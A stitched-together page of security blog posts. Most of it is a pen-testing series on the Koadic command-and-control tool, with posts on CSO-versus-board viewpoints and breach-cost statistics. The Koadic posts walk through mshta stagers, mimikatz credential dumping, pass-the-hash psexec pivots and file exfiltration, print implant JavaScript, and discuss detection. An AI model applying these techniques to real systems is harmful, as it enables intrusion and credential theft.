By the way, Koadic conveniently allows you to reload modules on the fly without having to restart everything! I can tweak my code and use the “load” command in the Koadic console to activate the updates.

My very own Koadic implant. And notice how I was able to change the code on the fly, reload it, and then run it.

I went into detail about all this, partially to inspire you to roll your own implants. But also to make another point. The underlying techniques that Koadic relies on —  rundll32 and mshta — have been known about by hackers for years. What Koadic does is make all this hacking wisdom available to pen testers in a very flexible and relatively simple programming environment.

Some Pen Testing Wisdom

Once you get comfortable with Koadic, you can devise your own implants, quickly test them, and get to the more important goal of pen testing — finding and exploring security weaknesses

Let’s say I’m really impressed by what Sean and Zach have wrought, and Koadic has certainly sped up my understanding of the whole testing process.

For example, a funny happened when I first went to try my enum_adusers implant. It failed with an error message reading something like this,“ Settings on this computer prohibit accessing a data source on another domain.”

I was a little surprised.

If you do some googling you’ll learn that Windows Internet security controls has a special setting to allow browser scripts to access data sources. And in my AWS testing environment, the Amazon overlords wisely made sure that this was disabled for my server instance, which, it should be noted, is certainly not a desktop environment. I turned it on just to get my implant to pull in AD users to work.

Gotcha! Enabling “Access data sources across domain” allowed my implant to work. But it’s a security hole!

Why was the JavaScript I coded for the Koadic implant being treated as if it were a browser-based script, and therefore blocked from making the connection to Active Directory?

Well, because technically it is running in a browser! As I mentioned last time, the Koadic scripts are actually executed by mshta, which is Microsoft’s legacy product for letting you leverage HTML for internal business apps.

The real pen testing wisdom I gained is that if this particular script runs, it means that the remote data source security control is enabled, which is not a good thing, even and perhaps especially on a server.

Next time, I’ll be wrapping up this series, and talk about defending against the kinds of attacks that Koadic represents — stealthy script-based malware.

Continue reading the next post in "Koadic Post-Exploitation Rootkit"

Master Fileless Malware Penetration Testing!

Master Fileless Malware Penetration Testing!

Our five-part series brings you up to speed on stealthy techniques used by hackers. Learn how to sneakily run scripts with mshta, rundll32, and regsrvr32, scary Windows binaries that live in your System32 folder!

Continue reading the next post in "Living off the Land With Microsoft"

CEO vs. CSO Data Security Mindsets, Part I

CEO vs. CSO Data Security Mindsets, Part I

If you want to gain real insight into the disconnect between IT and the C-levels, then take a closer look at the Cyentia Institute’s Cyber Balance Sheet Report, 2017. Cyentia was founded by the IOS blog’s favorite data breach thinker and statistician, Wade Baker. Based on surveying over 80 corporate board members and IT executives, Cyentia broke down the differing data security viewpoints between CSOs and the board (including CEOs) into six different areas.

The key takeaway is that it’s not just that IT doesn’t speak the same language as the business side, but also that the business executives and IT view and think about basic security ideas, values, and metrics differently. It’s important to get everyone on the same page, so I applaud Cyentia for their efforts.

The report and its findings were the inspiration — thanks Wade —  behind this IOS blog mini-series. It’s my modest attempt to bridge the viewpoint gap, and try to get everyone on the same page. (And after that I’ll take on  world peace.)

In this first post, we’ll look at some of the Cyber Balance Sheet’s intriguing results and observations. In the second and third posts, I’ll attempt to act as couples counselor, and explain ideas that one side needs to know about the other.

When Worlds Collide

Let’s look first at one of the more counter-intuitive results that I discovered in the report.

Cyentia asked both CSOs and board subjects to rate the value of cybersecurity to their business in five different categories: security guidance, business enabler, loss avoidance, data protection, and brand protections (see chart below).

Source: Cyber Balance Sheet Report, 2017 (Cyentia Institute)

Yeah, I’m a little surprised that data protection was rated by under 30% of CSOs, but over 80% of board members as valuable. Maybe, I’m a crazy idealist, but you’d think that would be job #1 for CSOs!

The explanation from Cyentia on this point is worth noting: “CSOs of course knows that data protection lies in their purview … and so they’ve learned to position data protection as a business enabler than a cost center.”

I think what Cyentia is getting at is that CSOs feel strongly that they bring real value to their business and not just red ink — not just providing a data protection service. And that jibes with the fact that 40% of CSOs say they are business enablers. Although that belief is not shared equally by the board — only 20% of them think that.

The key to all this is the difference in the breakdown on the “brand protection” value: over 60% of board members saw this as important, but it barely made a blip with CSOs, at  less than 20%.

I’m not surprised that CSOs don’t see their job as being the brand police. I don’t necessarily blame them. I can almost hear them screaming “I’m an IT professional not a brand champion.”

But let’s look at this from a risk perspective, which is the viewpoint of CEOs and boards. As one of the board-level interviewees put it in the report, their biggest concern is the legal and business implications of a data breach. They know a data breach or an insider attack can have serious reputational damage, leading to lost sales and law suits, which all work out to hard dollars. Brand damage is very much a board-level issue!

Ponemon, of course, has been tracking both the direct and enormous indirect costs involved in breach incidents with its own reports over the years, and recent news only adds to the evidence.

Cynentia has identified an enormous gap between what CSOs think is important versus the board regarding the value of cybersecurity. This leads nicely to another result of theirs related to security metrics.

Let’s Talk About Risk

The metric measurements in the report (see section 4) are also revealing and detail more of this diverging viewpoint. Of course, CSOs are focused on various IT metrics, particularly related to security incidents, responses, governance, and more.

Now that’s a disparity! CSOs underplay the importance of risk. (Source:Cyentia Institute)

Cyentia tells us there’s approximately a balance between both sides for many of the IT metrics. However, there’s a large gap between CSOs and boards over the the importance of “risk posture” metrics. It’s mentioned by 80% of boards versus only 20% of CSOs. That’s a startling disparity.

What gives?

IT loves operational security metrics: the ones mentioned above along with lots of details about day-to-day operations, involving patching status, malware or virus scanner stats, and more.

But that’s not what board members, who may not be as technically knowledgeable in a narrow IT sense, think is important for their work!

These folks have enormous experience running actual businesses. CEOs and their boards, of course, need to plan ahead, and these savvy business pros expect there to be uncertainty in their plans. That comes with the territory.

What they want from IT is a quantification of how bad an outcome of a breach, or insider attack, or accidental disclosure can reach in dollars, and the frequency or probability that these events could happen.

You can think of them as disciplined high-tech gamblers who know all the probabilities of each outcome and place their bets accordingly. Pro tip: they’re probably great poker players.

For Next Time

If you want to get ahead of the game, take a look at Evan Wheeler’s presentation at this years RSA conference. Evan is a CISO and risk management expert. If you want to understand what a risk profile is, check out his explanation at around the 25-minute mark.

His key point is that business leaders are interested in both rare cybersecurity events that incur huge losses – think Equifax – and more likely events but that typically have far lower costs – spam mail, say, to get corporate credit card numbers use in the travel department. They have different ways of dealing with each of these outcomes.

We’ll get a little more into the weeds next time when we look at “exceedance probabilities”, which is basically a more quantified version of a risk profile. It’s a great topic, and one that CSOs should become more familiar with.

There are other interesting stats in the Cyentia report – blow your mind by perusing the chart showing different perspectives on security effectiveness. I urge you to download it for yourself and spend time mulling over the fine points. It’s well worth the effort.

 

 

Continue reading the next post in "CEO vs. CSO Mindsets"

Koadic: Pen Testing, Pivoting, & JavaScripting, Part II

Koadic: Pen Testing, Pivoting, & JavaScripting, Part II

Mshta and rundll32, the Windows binaries that Koadic leverages, have been long known to hackers. If you take a peek at Mitre’s ATT&CK database, you’ll see that rundll32 has been the basis for attacks stretching over years. Pen-testing tools, such as Koadic, have formalized established hacking wisdom, thereby helping IT people (and bloggers) to understand threats and improve defenses.

I’ll add that it makes sense to also take a deeper dive into Koadic’s design to gain even more insights into possible defense strategies. With that in mind, let’s go over a few ideas from last time.

Playing Pen Tester (and Blue Teamer)

We saw how Koadiac, like all command and control or C2 servers, lets us send commands from its console to the targeted computer on which a small-footprint JavaScript shell (more on that below) launches the actual Windows commands.

As a pen tester, one of the first things you want to learn is whether there’s interesting data that you can access and then copy or exfiltrate. For my pretend AWS environment, you can see below how I used legacy findstr to zoom into a file containing sensitive data.

I then used implant/util/download_file to bring it back home.

Switching to my “blue team” persona, let’s now take a quick look at the Windows Event logs.

To begin to understand what’s happening, I enabled very granular logging. I was doing this for educational purposes — and isn’t this what pen testing is about? —  but you may not be able to depend on detailed logs in real-world post-exploitation analysis. However, as we’ll soon see, Koadic does leak information into the file world — it’s not completely fileless. And this provides an opening for a different kind of defense.

The first interesting log entry is one showing rundll32 pulling in a remote script – which I discussed back in my LoL series. This is not, clearing throat, a standard use of this utility, and should raise flags. By the way, Windows Defender (in Windows 10) can spot some of the dark uses of this LoL-ware.

And then a little further on in the log is this revealing entry:

This should raise suspicions: indirect execution of a command coupled with redirection of output.

Of course, this is the result of the findstr command that I previously sent to my zombie. The larger point is that it’s being run indirectly  via the launching of a cmd shell to then run findstr. It’s actually what happens when you run a shell command within JavaScript: you use ActiveX to create a shell session and then pass it the command, something like this:

var r = new ActiveXObject("WScript.Shell").Run("finstr /I private C:\VIPs");

 

Did you notice the 1> and  2>1& part of the command in the log entry? Those of us of a certain vintage immediately recognize that it’s Unix/Linux for directing standard output to a file and redirecting standard error to standard output.

Sure, there are legit reasons for doing all this, but it’s also the way you would relay output from a command (launched by malware) back to the hacker’s attacker server —save it to a file, read the file, and then delete it. This is in fact what Koadic does.

Detailed event logging, though potentially containing useful information, may not be always be available. But it doesn’t matter! If you can relate these short burst of file creation and deletion activity with access to executable files that are rarely visited by the user, such as rundll32, and the copying of files containing sensitive information, then you’re on the way to detecting and stopping an attack.

In short: there’s a little bit of file noise often generated by malware that can be detected by those security defenses that are capable of monitoring abnormal file activity on a user basis.

Real-World Pivots With Koadic

Last time, I began to show you how to configure Koadic for a lateral move or pivot. Let’s finish this up and do a real pivot.

Assuming there are other domain credentials available, Koadic provides the implant/inject/mimikatz_dynwrapx module to pull out the cached hashes and, when possible, actual passwords. If you then enter the creds command, you can reference the credentials using a numeric identifier.

With Koadic’s credential id number, I can pass the hash (or password) to psexec.

Let’s assume I’ve learned that masa is another server in the acme.corp domain, and that I’m using the credentials of the user named lex. I’m now ready to run implant/pivot/exec_psexec.

I set the pathname to the psexec executable, which I previously uploaded, provided the credid of lex’s credential, and for the remote command to execute, I supplied the initial mshta stager that landed me on the victim’s computer. You leapfrog to the next computer by simply implanting another Koadic Javascript client.

That should have been enough to get this started.

But  …  Koadic didn’t seem to properly pull out the fully qualified domain name of the credential from the cache, so I had to tweak the JavaScript code.  I was forced to override the cached domain information through whatever was explicilty configured through the set command.

My headaches didn’t end there: my lateral move was initially blocked. Psexec experts probably know this, but I learned the hard way that you have to provide the –h option for “elevated credentials” (even if aleady have the plaintext password).  More code changes.

Pivoting with Koadic: same mshta stager, different target.

On the bright side, Koadic’s script-based environment makes code updates relatively painless. Note to Sean and Zach: I think you need to take a closer look at the exec_psexec implant.

Once psexec runs successfully with the mshta payload, Koadiac establishes another zombie. (Yes, that’s quite a sentence.)

I now had two zombies: one controlling pepper.corp.acme, my initial target, and the second one handling masa.corp.acme. I’m now a zombie master!

To communicate with the new zombie, I just needed to make sure I set the appropriate zombie number, and then run the command. You can see my zombie sorcery below:

I now control two zombies! How many can make that same boast?

Diving Into the Koadic Kode and Kraziness

I will be merciful and end this post soon enough! Before we break until next time, I wanted to start a dive into Koadic’s architecture. It’s helpful – I think –in terms of really understanding your pen testing and in getting insights into real-world post-exploitation malware.

The one word that describes the Koadic (and other malware creations) is obfuscatory. There’s nothing straightforward to the way it runs commands. Some of this is intentional to throw off the defense, but C2 environment are also inherently complicated.

I’ll go into this in more detail next time, but here’s the $.10 tour.

The mshta stager that pulls in the initial payload doesn’t hang around very long. It then launches rundll32, which loads the main Koadic client code. At this point, the client is in a loop waiting for commands from the Koadic server – the client console that I showed above.

Showing a small part of the client-side JavaScript pulled in by rundll32. You can see the code for launching a Windows command sent from the Koadic C2 server. Note the encasing HTA.

Once it receives a command, say to execute “ipconfig”, the client-side of Koadic acts like a Unix/Linux shell — forking and execing commands. In our case, the Koadic client then launches another rundll32 whose sole function is to connect back to the Koadic server and pull in specially served up JavaScript — essentially the ActiveX code to launch a Windows shell session to run ipconfig. This child rundll32 is transient, exiting after it completes its execution of  a single command and leaving  the parent rundll32 to carry out the next commands.

Basta, for now!

If you’re looking for a homework assignment, you should study this section of the Koadic’s github. Hint: stdlib.js forms the core of the Koadic client.

 

Continue reading the next post in "Koadic Post-Exploitation Rootkit"

Koadic: LoL Malware Meets Python-Based Command and Control (C2) Server, Par...

Koadic: LoL Malware Meets Python-Based Command and Control (C2) Server, Part I

In my epic series on Windows binaries that have dual uses– talkin’ to you rundll32 and mshta — I showed how hackers can stealthy download and launch remote script-based malware. I also mentioned that pen testers have been actively exploring the living-off-the land (LoL) approach for post-exploitation. Enter Koadic.

I learned about Koadic sort of by accident. For kicks, I decided to assemble a keyword combination of “javascript rundll32 exploitation” to see what would show up. The search results led me to the Koadic post-exploitation rootkit, which according to its description “does most of its operation using Windows Script Host.” I was intrigued. By the way, Koadic is hacker-ese for COM Command and Control.

A good starting point for learning about Koadic is a Defcon presentation given by its two developers, Sean Dillon and Zach Harding. Koadic looks and acts like PowerShell Empire with script-based stagers and implants. The key difference, though, is that Koadic instead relies on JavaScript and VBScript on the victim’s computer.

As they note in their presentation, IT defenders are now more attuned to the fact that PowerShell can be used offensively. In other words, security teams are looking for unusual PS activity in the Windows event logs. They are not as focused (yet) on scripts run by the Windows Script Host engine. And that was some of the inspiration behind Koadic, which I suppose can be called JavaScript Empire.

Microsoft has also helped matters by adding PowerShell-only logging modules, a topic I explored in my amazing mini-series on obfuscation techniques.

Defenders can selectively turn on PS logging. They can not do the same for JavaScript.

To log scriptware (other than PowerShell), Windows forces you to enable auditing of every process launched. Eeeks.

To analyze Koadic’s script activity, you have to bite the bullet and enable detailed logging, which results in an entry for each process launched in Windows. Let’s just say the Windows log ain’t a pretty place after that’s done, and this event fog helps hide Koadic’s activities.

Start Me Up With a Mshta Stager

Thankfully, I had malware analysis help from our amazing NYC-based summer intern, Daniel Vebman, who sanity checked my ideas and did some valuable exploring of his own.

In this first post, let’s take a shallow dive into Koadic’s capabilities and architecture. One of the major themes to keep in mind with Koadic is that its script-based approach gives the attackers the ability to change code on the fly, and adapt quickly to new environments.

How do you detect stealthy post-exploitation activities of Koadic-style attacks in the real world? I’ll come to that later on in the series, but clearly you’ll need to move beyond the Windows event log and, ahem, focus on the underlying file system.

To get started, we installed the software from Github on an Ubuntu instance in our AWS environment. We hit a few snags  but this was quickly solved by the ever-resourceful Daniel, who reinstalled Koadic’s Python modules (and did it right).

Yes, the server-side of Koadic is Python-based.

To do its work, Koadic leverages Windows binaries that sneakily pull in remote JavaScript or VBScript. Essentially, the ones I covered in my living-off-the land series: mshta, rundll32, and regsvr32.  It appears, though, from reading the notes that only mshta works, so that’s the stager we used in our testing.

Let’s assume the mshta stager was delivered to a victim via, say, a phish mail. Once activated, Koadic then creates a “zombie”. It’s their way of saying it has control over the victim’s machine. The zombification — it’s a word — is accomplished through a library of JavaScript-based implants.

Night of the Koadic Zombie!

In a realistic pen-testing scenario, the first task is to answer the who and where questions. After all, the payload has landed somewhere on laptop or server of a random user in the Intertoobz.

Koadic’s implant/manage/exec_cmd does as advertised: lets you run individual shell commands remotely. As with all the implants, you enter the “info” command to see what the basic parameters are and then set them accordingly.

Who am I? Where am I? All of life’s and pen-tester’s basic questions can be answered by running shell commands remotely.

For exec_cmd, I had my zombie execute whoami, hostname, and ipconfig on my pretend victims’ computer — a Windows Server 2012 in my AWS instance.

Let’s Look Around

Once you have the basics, it’s then helpful to discover the full qualified domain name (FQDN) of the Windows environment you’ve landed in. As we’ll see, you’ll need the domain name to move off the initially hacked computer.

For that I need to resort to PowerShell by setting the cmd parameter to GetHostByName($env:computerName). It’s a benign PS cmdlet, so in theory it shouldn’t raise any eyebrows if it’s logged.

Getting the domain name through a PowerShell cmdlet.

What about scanning the network to learn about IP addresses?

That’s where implant/scan/tcp comes into play. There’s also the implant/gather/user_hunter  to discover users who are currently logged in.

In short: Koadic has built-in support for getting essential environmental information and, of course, the ability to run shell commands to fill in the gaps. By the way, a description of all its commands can be found on the Github home page.

Doing the Psexec Pivot

Unless a hacker is very lucky and lands on a server that has millions of unencrypted credit card numbers, she’ll need to leapfrog to another computer. The way this is done is to harvest domain-level credentials, eventually find one that has elevated permissions, and then perform a lateral move.

Once upon a time, I wrote about how to use mimikatz and psexec do just that. Koadic has conveniently provided a mimikatz-based implant to retrieve credentials from SAM memory and another one to support psexec. Small quibble: you have to explicitly upload the psexec executable to the victim’s computer and set the path name.

For example, to retrieve credentials I ran implant/inject/mimikatz_dynwrapx:

Koadic’s mimikatz dll shows NTLM hashes and even the password, thanks to the wdigest security hole.

You can see the NTLM hashes, which you can crack offline if need be. But because of the infamous wdigest security hole, you also get the plain text passwords. Eureka!

I won’t show how to do an actual lateral move or pivot in this post, but you can see the setup for the implant/pivot/psexec below:

By the way, you get the credid number from the creds command. It will automatically PtH for you!

I’ll explain next time how to do a real-word pivot by filling in the cmd parameter with the initial mshta stager, thereby creating another zombie. The idea is to continue the pattern of harvesting credentials with mimikatz and then pivoting. Yeah, you end up controlling an army of zombies. Evil!

A Little JavaScript Plumbing

That’s the quick $.50 tour of Koadic. One last bit of business is a high-level view of the architecture.

Koadic is essentially a remote access trojan or RAT. Nowadays, we give it the fancier name of a command and control (C2) server. In any case, the principles are easy enough to grasp: the client side executes the commands from the remote server.

In the case of Koadic, the client side is not a binary — as they were for the early RATs — but instead it’s 100% JavaScript. The client’s sole function is to loop and pull in remote implants—written in either JavaScript or VBScript — from Koadic’s Python-based server, run them, and send the results back.

By the way, there’s some clever programming in Koadic wherein the server-side Python crafts the actual JavaScript implant. I’ll get into more details further on in the series.

Let me draw back the curtain to remove some of the mystery around the implants. Here’s the raw JavaScript in Koadic that actually launches psexec:

try
  {
    var rpath = "~RPATH~"
    var UNC = "~RPATH~\\psexec.exe ";
    var domain = "~SMBDOMAIN~";
    var user = "~SMBUSER~";
    var pwd = "~SMBPASS~";
    var computer = "\\\\~RHOST~ ";
  

    UNC += computer;
  

    if (user != "" && pwd != "")
    {
        if (domain != "" && domain != ".")
        {
          user = '"' + domain + "\\" + user + '"';
        }
  

        UNC += "-u " + user + " -p " + pwd + " ";
    }
  

    UNC += " -accepteula ~CMD~";
  

    // crappy hack to make sure it mounts
    var output = Koadic.shell.exec("net use * " + rpath, "~DIRECTORY~\\~FILE~.txt");
  

    if (output.indexOf("Drive") != -1)
    {
      var drive = output.split(" ")[1];
      Koadic.shell.run("net use " + drive + " /delete", true);
    }
  

    Koadic.WS.Run("%comspec% /q /c " + UNC, 0, true);
  

    Koadic.work.report("Complete");
  }
  catch (e)
  {
    Koadic.work.error(e);
  }

 

Yeah, those tilde encased variables are replaced with the real thing before it’s shipped off to the target system.

The key point is that this is a flexible environment. In fact, this infosec blogger (and former UNIX programmer) successfully made a few tweaks to the psexec data module to get it to work in our AWS environment.

Note to Shawn and Zach: I think there are issues in the way a fully qualified domain name is parsed by the mimikatz implant. Just sayin’.

For Next Time

I’ll cover this material again, and I’ll do an actual psexec pivot and get deeper into my pen-testing persona. I’ll also analyze the events produced by Koadiac so that we can see that it ain’t so easy to detect unusual activity from the raw logs.

One last thought: wouldn’t it be great for pen testing purposes if we were able to wangle Koadic to pull in Activity Directory information, say domain groups and their members? Kind of like what PowerView does.

Hold that thought, and next time we’ll also start on the task of creating our own implants. In the meantime, if you want to get ahead of the curve, you might want to study the Koadic modules in Github.

Continue reading the next post in "Koadic Post-Exploitation Rootkit"

Ponemon and NetDiligence Remind Us Data Breach Costs Can Be Huuuge!

Ponemon and NetDiligence Remind Us Data Breach Costs Can Be Huuuge!

Those of us in the infosec community eagerly await the publication of Ponemon’s annual breach cost analysis in the early summer months. What would summer be without scrolling through the Ponemon analysis to learn about last year’s average incident costs, average per record costs, and detailed industry breakdowns? You can find all this in the current report. But then Ponemon did something astonishing.

The poor souls who made it through my posts on breach costs stats learned that datasets used here are not normal. I mean that literally. They don’t correspond to a standard normal or bell curve. We also know from more in-depth studies that the data points are skewed with “heavy tails”, and are more accurately represented by power laws.

What does that have to do with Ponemon’s cost analysis?

Ponemon has avoided the issues of dealing with skewed data by lopping off the outliers — they don’t look at breach incidents above 100,000 records. Sure, you lose some information, but then the stats are more meaningful to the companies — most of them — that don’t live in the long tail of the curve.

Monster Breaches Are Costly. Very Costly.

Brace yourself. For 2018, Ponemon started looking at the dragon’s tail. They’ve included an analysis of mega data breaches involving incidents of over one million records.

First, let’s get the bad news out of the way. Since Ponemon only had 11 companies in their mega breach sample, they had to perform, gulp, a Monte Carlo analysis. That’s a fancy of way saying they were forced to make some guesses about a few of the parameters in their model, so they are randomly “sampled” to generate them.

The more important point is that in their graph below of breach costs vs. records stolen, the data points show a sub-linear or (more technically, a log-linear) relationship — the costs grow slower than a straight line. Double the number of records stolen, and the total breach cost is less than double.

Breach costs grow slower than a straight line. (Source: Ponemeon, 2018)

And that’s exactly what other researchers have seen with breach costs. I also pointed this interesting factoid out in my breach cost series — you can learn more here.

For CFOs and CIOs, there’s a drop of a good news in this slow growing curve.  It means that the cost per record drops as more records are involved.

For a data theft of 20 million records, the graph above indirectly tells us the average cost is about $18 per record, and at 50 million records, the per record cost decreases to about $7.

I suppose that may sound benign when quickly said in a presentation, but on the other hand … the total cost for a 50 million record theft is over $350 million.

And that’s something no board of directors wants to hear!

NetDiligence: Real-World Verification

While Ponemon’s theoretical analysis of mega breach costs is interesting, there is a dataset that sheds more light on real-world costs of these huge breaches. This comes to us courtesy of NetDiligence, a data risk analysis firm that has obtained access to actual claims data processed by cyber-insurance companies.

I looked at NetDiligence’s latest report for the period 2014 – 2017 period. It provides further validation that data breach costs at the high-end are, indeed, expensive.

According to NetDiligence, the average breach cost for the 591 claims in their dataset was about $394,000. They also calculated a median cost at a mere $56,000. Hmmm, with 50% of the data or 245 claims above $56K, there have to be monster incidents to explain the fact that average is about seven times higher than the median. This is the sign of a non-normal data set — the heavy-tailed curve that we typically see with breach stats.

I can do a quick back-of-the-envelope analysis to give you a better sense of mega costs lurking in the NetDiligence stats. Feel free to skip this next part if doing a multiplication with an average makes you slightly nauseous.

The total breach costs in the claims dataset is about $233 million (591 x 394,000). There’s a negligible amount of the total cost below the median – at most 56,000*246 or about $14 million. That leaves $219 million in costs above the median, which is then spread out over 245 claims. That means that the upper 50% has a  average cost of at least $890,000.

If you make some other assumptions – similar to what I did here — you quickly get to breach incidents in the millions of dollars for the top percentiles.

Anyway, NetDiligence doesn’t give away too many details about individual breach incidents in their analysis. But further down in the report, they reference some of the extreme costs in their claims dataset. This shows up in a table that breaks down costs by business size.

There are some monster incidents hidden in this table: $11 million, $15 million, and $16 million. (Source: NetDiligence)

If you look at the “Max” column, you can see that there are several incidents above $10 million. That ain’t chicken feed.

One Last Thing

It’s worth mentioning that Ponemon also includes indirects costs for incidents, which is based heavily on customer churn. This cost doesn’t show up in the cyber insurance claims because it’s based on hard costs —  legal fees, fines, credit monitoring, remediation efforts, etc.

In other words, Ponemon’s incident cost analysis will always trend significantly higher than the numbers from actual insurance claims. Ponemon’s costs numbers, though, are probably closer to a real-world cost, particularly for larger companies. And especially for public companies, where breach incidents can affect overall valuations. For example, Yahoo.

The key takeaway is that the headline-making breach incidents (Equifax, Yahoo, etc.) tell us about the very far end of the cost tail. The NetDiligence report in particular proves that there are still expensive data breaches, in the tens of millions of dollars, living in the middle of the tail.  And these are likely less publicized, and more typically experienced.

I’ll have more to talk about for both the Ponemon and NetDiligence reports in a future post.